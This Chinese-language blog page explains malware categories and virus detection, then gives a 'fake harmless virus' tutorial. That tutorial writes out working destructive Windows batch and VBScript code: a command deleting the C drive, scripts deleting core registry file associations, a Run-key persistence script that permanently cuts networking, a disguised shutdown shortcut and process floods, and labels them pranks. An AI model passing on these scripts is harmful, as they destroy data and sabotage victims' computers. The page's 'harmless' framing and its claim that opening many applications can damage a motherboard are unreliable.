Malware and Virus

目录

• A Guide to Computer Malware
• Basics of Computer Science - Virus
• How To Create Fake Harmless Virus Using Notepad

 

---

回到顶部

A Guide to Computer Malware

malware = malicious software 恶意软件

病毒 ∈ 恶意软件 = 任何对计算机系统有害的代码段

恶意软件的分类

1. 病毒 Virus，它将自己的代码插入到其他计算机程序中，通过感染程序传播。

2. 蠕虫 Worm，它通过自我赋值并在计算机网络中传播来感染其他计算机。蠕虫通常被设定为利用某个安全漏洞。一旦它感染了一台计算机，就会搜索具有相同漏洞的其他计算机，感染它们，直到该网络上的所有计算机都受到感染。

3. 木马 Trojan，它是任何恶意软件程序，假装成合法的程序，欺骗用户下载或运行。

4. 流氓安全软件 Rogue Security Software/伪安全软件 Scareware，木马的子集。

5. 恶意软件广告 Malvertising，它使用合法广告向访问网页的用户传播恶意软件。点击该链接时会被重定向到一个虚假的网页，从而窃取信息或者直接下载一段恶意软件。更有甚者会产生“驱动下载”，即只要访问含有恶意广告的页面，就会导致计算机下载恶意软件，无论是否点击广告。

6. 无文件恶意软件 Fileless Malware(内存恶意软件 Memory Malware)，它仅仅作为基于计算机内存的工件存在，不需要感染其他程序就可以传播。一旦计算机关闭，它就会被删除，存在的证据也会丢失。

7. Rootkit，它被设计成安全软件需要检测较长时间，使得攻击者可以访问和窃取用户的信息。它安装在比应用软件更深的地方，而应用软件是杀毒软件和安全系统的所在，因此它很难被发现或移除。内核级别的rootkit使攻击者能够完全控制计算机；bootkit会在到达登录界面之前感染启动和运行计算机的软件。

8. 文件宏 File Macros，它是利用Excel和Word文档中的宏的恶意软件，可以被创建并附加到这些文件中，一旦有人打开它并启用宏，它就会运行并感染系统。

9. 多态 Polymorphic，它不断改变自己可识别的特征以避免检测。大约97%的恶意软件使用某种类型的多态技术。

恶意软件的类型

介绍恶意软件一旦进入计算机中，将做什么

恶意软件的任何分类都可能具有一种或多种类型的特征

1. 广告软件 Adware，相对无害。

2. 勒索病毒 Ransomware，它会对受感染系统上的所有信息进行加密，并要求所有者支付费用使文件恢复正常。

3. 间谍软件 Spyware，它收集信息并将这些信息发送给攻击者。

4. 后门 Backdoor，它让攻击者在任何时候都可以连接到你的电脑。

5. 机器人 Bots/僵尸网络 Botnet，Bot是一种潜伏在计算机上的软件，直到黑客使用命令与控制服务器(C&C)向它发出命令。被控制的计算机被称为Bot，被控制计算机的集合被称为Botnet。

6. Cryptojacker，它帮助黑客利用你的计算机的处理能力。挖掘加密货币，创造利润。

7. 键盘记录器 KeyLogger，它记录计算机上的击键并将该信息发回给攻击者。

8. RAM刮刀 RAM scraper，它远程访问计算机上的RAM收集信息并将其发送回黑客。

9. 浏览器劫持 Browser Hijacking，它是指恶意软件改变浏览器的工作方式，重定向到黑客想让你访问的网站，或者从浏览器存储的关于你在线活动的cookie中窃取你的信息。

回到顶部

Basics of Computer Science - Virus

系统感染上病毒的情况

网上下载的文件、移动介质或驱动器、U盘、电子邮件附件、未打补丁的软件和服务、未保护的或糟糕的管理员密码

病毒对计算机系统的影响

干扰电脑系统的正常运作、中断系统网络使用、修改系统配置设置、破坏数据、中断计算机网络资源、销毁机密数据

检测病毒

最基本的方法是检查计算机系统的功能。受病毒影响的计算机不能正常执行命令。

计算机系统中有杀毒软件时，通过检查系统中的程序和文件的病毒签名来检测病毒。

回到顶部

How To Create Fake Harmless Virus Using Notepad

使用记事本创建病毒

1. 危险病毒

在Windows操作系统中，打开记事本，输入

@Echo off
Del C: *.* |y

将此文件保存为virus.bat。运行该文件将完全删除C盘，计算机的操作系统将被损坏！

2. 无害的Cdrom病毒

记事本中输入

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

保存为CD-ROM.vbs。双击此文件时，CD/DVD驱动器将不断弹出。阻止此病毒需要打开任务管理器，选择进程选项卡，结束wscript.exe文件。

3. 测试杀毒软件

打开记事本输入

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

保存为EICAR.COM。如果有一个活动的杀毒程序，杀毒程序将删除这个文件。这是一种用于检查杀毒软件安全级别的无害病毒。

4. 断网

@Echo off
Ipconfig /release

保存为internet.bat。修复IPconfig /renew。

5. Matrix Type screen

@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start

保存为matrix.bat。这不是病毒，而是一个简单的记事本技巧。

6. 关机

右键选择创建快捷方式选项。在弹出窗口中，键入shutdown -s -t 60 -c “Virus Detection. The computer is shutting down.”以秒为单位。点击Next，键入chrome或者随便你想要什么。然后，修改“快捷方式”图标。

7. 永久关闭互联网

[alert-note]echo @echo off>c:windowswimn32.bat
echo break off>c:windowswimn32.bat echo
ipconfig/release_all>c:windowswimn32.bat
echo end>c:windowswimn32.batreg add
hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /freg add
hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /fecho ENTER YOUR MESSAGE!!
PAUSE[/alert-note]

8. 无休止地弹出记事本

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

9. 无休止地Enter

Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop

10. 删除关键注册表文件

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your PC has been crashed.Your Dad.
GOTO MESSAGE

重新安装Windows是从这种危险病毒中恢复的唯一选择。

11. 应用轰炸

@echo off
:x
start winword
start mspaint
start notepad
start write
start cmd
start explorer
start control
start calc
goto x

可能损坏主板。